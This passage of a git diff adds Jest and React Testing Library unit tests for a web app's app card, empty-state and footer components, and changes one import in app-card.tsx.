expect(screen.getByText('app.export')).toBeInTheDocument() + expect(screen.getByText('common.operation.delete')).toBeInTheDocument() + }) + }) + }) + + describe('Open in Explore - No App Found', () => { + it('should handle case when installed_apps is empty array', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockResolvedValueOnce({ installed_apps: [] }) + + // Configure mockOpenAsyncWindow to call the callback and trigger error + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise, options: any) => { + try { + await callback() + } + catch (err) { + options?.onError?.(err) + } + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + + it('should handle case when API throws in callback', async () => { + const { fetchInstalledAppList } = require('@/service/explore') + fetchInstalledAppList.mockRejectedValueOnce(new Error('Network error')) + + // Configure mockOpenAsyncWindow to call the callback without catching + mockOpenAsyncWindow.mockImplementationOnce(async (callback: () => Promise) => { + return await callback() + }) + + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const openInExploreBtn = screen.getByText('app.openInExplore') + fireEvent.click(openInExploreBtn) + }) + + await waitFor(() => { + expect(fetchInstalledAppList).toHaveBeenCalled() + }) + }) + }) + + describe('Draft Trigger Apps', () => { + it('should not show open in explore option for apps with has_draft_trigger', async () => { + const draftTriggerApp = createMockApp({ has_draft_trigger: true }) + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.editApp')).toBeInTheDocument() + // openInExplore should not be shown for draft trigger apps + expect(screen.queryByText('app.openInExplore')).not.toBeInTheDocument() + }) + }) + }) + + describe('Non-editor User', () => { + it('should handle non-editor workspace users', () => { + // This tests the isCurrentWorkspaceEditor=true branch (default mock) + render() + expect(screen.getByTitle('Test App')).toBeInTheDocument() + }) + }) + + describe('WebApp Auth Enabled', () => { + beforeEach(() => { + mockWebappAuthEnabled = true + }) + + it('should show access control option when webapp_auth is enabled', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.accessControl')).toBeInTheDocument() + }) + }) + + it('should click access control button', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + const accessControlBtn = screen.getByText('app.accessControl') + fireEvent.click(accessControlBtn) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + }) + + it('should close access control modal and call onRefresh', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.accessControl')) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + + // Confirm access control + fireEvent.click(screen.getByTestId('confirm-access-control')) + + await waitFor(() => { + expect(mockOnRefresh).toHaveBeenCalled() + }) + }) + + it('should show open in explore when userCanAccessApp is true', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + expect(screen.getByText('app.openInExplore')).toBeInTheDocument() + }) + }) + + it('should close access control modal when onClose is called', async () => { + render() + + fireEvent.click(screen.getByTestId('popover-trigger')) + await waitFor(() => { + fireEvent.click(screen.getByText('app.accessControl')) + }) + + await waitFor(() => { + expect(screen.getByTestId('access-control-modal')).toBeInTheDocument() + }) + + // Click close button to trigger onClose + fireEvent.click(screen.getByTestId('close-access-control')) + + await waitFor(() => { + expect(screen.queryByTestId('access-control-modal')).not.toBeInTheDocument() + }) + }) + }) +}) diff --git a/web/app/components/apps/app-card.tsx b/web/app/components/apps/app-card.tsx index b8da0264e4..8140422c0f 100644 --- a/web/app/components/apps/app-card.tsx +++ b/web/app/components/apps/app-card.tsx @@ -5,7 +5,7 @@ import { useContext } from 'use-context-selector' import { useRouter } from 'next/navigation' import { useTranslation } from 'react-i18next' import { RiBuildingLine, RiGlobalLine, RiLockLine, RiMoreFill, RiVerifiedBadgeLine } from '@remixicon/react' -import cn from '@/utils/classnames' +import { cn } from '@/utils/classnames' import { type App, AppModeEnum } from '@/types/app' import Toast, { ToastContext } from '@/app/components/base/toast' import { copyApp, deleteApp, exportAppConfig, updateAppInfo } from '@/service/apps' diff --git a/web/app/components/apps/empty.spec.tsx b/web/app/components/apps/empty.spec.tsx new file mode 100644 index 0000000000..8e7680958c --- /dev/null +++ b/web/app/components/apps/empty.spec.tsx @@ -0,0 +1,53 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import Empty from './empty' + +describe('Empty', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + + it('should render 36 placeholder cards', () => { + const { container } = render() + const placeholderCards = container.querySelectorAll('.bg-background-default-lighter') + expect(placeholderCards).toHaveLength(36) + }) + + it('should display the no apps found message', () => { + render() + // Use pattern matching for resilient text assertions + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) + + describe('Styling', () => { + it('should have correct container styling for overlay', () => { + const { container } = render() + const overlay = container.querySelector('.pointer-events-none') + expect(overlay).toBeInTheDocument() + expect(overlay).toHaveClass('absolute', 'inset-0', 'z-20') + }) + + it('should have correct styling for placeholder cards', () => { + const { container } = render() + const card = container.querySelector('.bg-background-default-lighter') + expect(card).toHaveClass('inline-flex', 'h-[160px]', 'rounded-xl') + }) + }) + + describe('Edge Cases', () => { + it('should handle multiple renders without issues', () => { + const { rerender } = render() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + + rerender() + expect(screen.getByText('app.newApp.noAppsFound')).toBeInTheDocument() + }) + }) +}) diff --git a/web/app/components/apps/footer.spec.tsx b/web/app/components/apps/footer.spec.tsx new file mode 100644 index 0000000000..291f15a5eb --- /dev/null +++ b/web/app/components/apps/footer.spec.tsx @@ -0,0 +1,94 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import Footer from './footer' + +describe('Footer', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('Rendering', () => { + it('should render without crashing', () => { + render(